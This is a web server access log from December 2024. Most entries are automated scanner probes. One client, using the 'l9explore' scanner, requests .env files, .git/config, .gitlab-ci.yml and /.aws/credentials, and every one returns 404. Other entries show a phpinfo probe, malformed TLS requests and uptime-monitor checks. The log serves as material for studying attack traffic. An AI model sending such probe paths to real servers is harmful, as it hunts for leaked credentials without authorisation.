179.43.163.250 - - [02/Dec/2024:11:19:59 +0100] "GET /.env.staging.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:59 +0100] "GET /.gitlab-ci.yml HTTP/1.1" 404 319 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:00 +0100] "GET /assets../.git/config HTTP/1.1" 404 325 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:00 +0100] "GET /config/.env HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:00 +0100] "GET /project/.git/config HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:00 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:00 +0100] "GET /.env.qa HTTP/1.1" 404 312 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:01 +0100] "GET /.env.stage HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:01 +0100] "GET /prod/.env HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:01 +0100] "GET /server/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:01 +0100] "GET /.env.dist HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:20:02 +0100] "GET /.env.docker HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
212.91.246.72 - - [02/Dec/2024:11:20:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.236.240.131 - - [02/Dec/2024:11:21:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
35.236.240.131 - - [02/Dec/2024:11:21:02 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Dec/2024:11:21:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.59.177.211 - - [02/Dec/2024:11:22:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:22:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.115.34 - - [02/Dec/2024:11:22:35 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1"
34.142.62.142 - - [02/Dec/2024:11:22:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.142.62.142 - - [02/Dec/2024:11:22:54 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
77.105.166.134 - - [02/Dec/2024:11:23:10 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:23:10 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
